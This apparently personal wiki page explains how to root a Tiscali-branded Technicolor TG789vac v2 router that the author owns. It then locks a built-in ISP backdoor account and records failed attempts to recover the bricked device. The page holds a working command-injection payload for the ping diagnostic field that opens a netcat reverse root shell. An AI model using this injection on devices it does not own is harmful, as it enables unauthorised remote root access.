User Tools

Site Tools


Rooting the router Technicolor TG789vac v2

This router DSL/FTTH Home router is running OpenWRT, it can bee rooted with few simple commands.

I tested the following procedure on a model shipped by Tiscali, an Italian Service Provider.

Product Vendor Technicolor
Product Name MediaAccess TG789vac v2
Software Version 16.3
Firmware Version 16.3.7636-2921002-20170419153951
Bootloader Version 2.0.85
Hardware Version VANT-6

The router default IP address is (beware that it has a DHCP server enabled), web access is with admin login and admin password.

You need a PC connected on the same LAN (I used a GNU/Linux box), issue the following command on the PC:

nc -lvvp 1025

this will bind the TCP port 1025 and start listening for an incoming connection.

On the router you have to navigate the Dignostic tile, then the Ping & Traceroute tab. Inside the IP Address text input, write the following command just before clicking the Send Ping Request button:

:::::::;nc 1025 -e /bin/sh

the IP address must be the one of your PC. On the PC you will get a root shell. Use the passwd command to change the root password:

Changing password for root
New password: MySecret
Retype password: MySecret
Password for root changed by root

Finally you have to permaently enable the ssh access for the root user (but only from the LAN interface), copy and paste the following commands exactly:

sed 's#root:/bin/false#root:/bin/ash#' /etc/passwd
sed 's/0/1/' /etc/config/dropbear
sed -i 's/off/on/' /etc/config/dropbear
sed -i "s/wan/lan/" /etc/config/dropbear
/etc/init.d/dropbear restart


The installed OpenWRT will fetch packages from this URL:

which indeed brigs the Not Found error.

The Tiscali Backdoor

Once you got ssh access to the rotuer, you can confirm that there is a Tiscali backdoor, just look at the /etc/passwd file:


and at the /etc/shadow one:


The password is unknown, but it is an high security risk to have that account enabled on the Wan side (as it was the Dropbear SSH server, per default). Tiscaly surely knows that password, may be also some bad guy alread had cracked it, but you are not able to change or disable it.

This is enough to justify your right to have root privileges, and use them to lock-down the tiscali backdoor:

passwd -l tiscali

Router Bricked

I succeeded in bricking this router, may be after I installed the openvpn package, which required the kmod-tun one. I mixed packages from different architectures and sources, so probably I got some unworkable mix. It is probable that my customization went into the overlay partition and the boot partition is still good, but unfortunately I don't know any method to clean or format the overlay.

I tried some recovery procedures, wihtout success.

Flash a new firmare via TFTP

Power-off, keep the reset switch pressed and power-on. This method can be used to start the bootp procedure, which indeed can load and flash the stock firmware from a TFTP server. I did that: it seems that the firmware is loaded because the TFTP server logs the activity and I can see the network traffic. But the router did not revive; I think that the overlay partition is still messed and the router cannot boot properly.

Factory reset

With the router powered-on and fully booted, press the reset switch for 7 seconds or more (someone says 20). The router should erase custom data and restart. Unfortunately this does not work for me, may be because the router is so messed-up, that the reset procedure does not even start.

Accessing the serial line

I connected a serial adapter (3.3 v) to the J5 tag soldering three wires to it. TX and RX lines correspond to R327 and R328 resistors. I connected the three pins to a serial-to-USB adapter using Minicom at 115200 8N1. The serial console is displayed, but it is in read-only mode, no input is accepted.

Technicolor Gateway
(c) 2015, All rights reserved

Decompressing Bootloader................................
Gateway initialization sequence started
Boot Loader Version : 2.0.85
CPU                 : BCM63168-D0
RAM                 : 256MB
Flash               : 128MB NAND, blocksize=128KB, pagesize=2048B
Board Mnemonic      : VANT-6
Market ID           : FFFCExternal switch id = 53125

Booting             : Bank 1
Magic packet        : 
SW Version          :
Starting the Linux kernel

[    0.000000] Initializing cgroup subsys cpu
[    0.000000] Linux version 3.4.11-rt19 (repowrt-builder@d0b3de64c70c)
               (gcc version 4.6.4 (OpenWrt/Linaro GCC 4.6-2013.05 r49389) )
               #1 SMP PREEMPT Thu Mar 9 02:28:17 UTC 2017
[    0.000000] VANT-6 prom init
[    0.000000] CPU revision is: 0002a080 (Broadcom BMIPS4350)

Forcing a bank switch

Someone says that this Technicolor router has two memory banks to store (flash) the firmware.

  • In normal condition, the router boot from bank_1.
  • Flashing via TFTP will write to bank_1 only. It will do so even if the active bank is currently bank_2. It will never set bank_1 as active.
  • You can see what is the active bank by reading /proc/banktable/active or by reading serial console output during bootstrap.
  • Whenever the Gateway fails to load the firmware image three times in a row from the active bank, the bootloader will enter Bootfail mode and will try booting from the inactive/passive bank, without setting it as active.
  • To force the switchover from one bank to the other, you have to run a command like echo bank_1 > /proc/banktable/active as root.

So I immagine at least two methods to force the router to boot from the other bank:

  1. Load a bad image via TFTP flashing (e.g. by disconnecting the cable during the upload, or powering the router off during the flash. I did not tried it.
  2. Force some memory read errors during bootstrap. This can be accomplished by connecting the RE# line (pin 8) of the TSOP chip to ground for some short times during bootstrap. This was reported to work by some users.

TSOP pinout

Credits and Web References

doc/appunti/hardware/technicolor_tg789vac_v2.txt · Last modified: 2020/03/23 18:52 by niccolo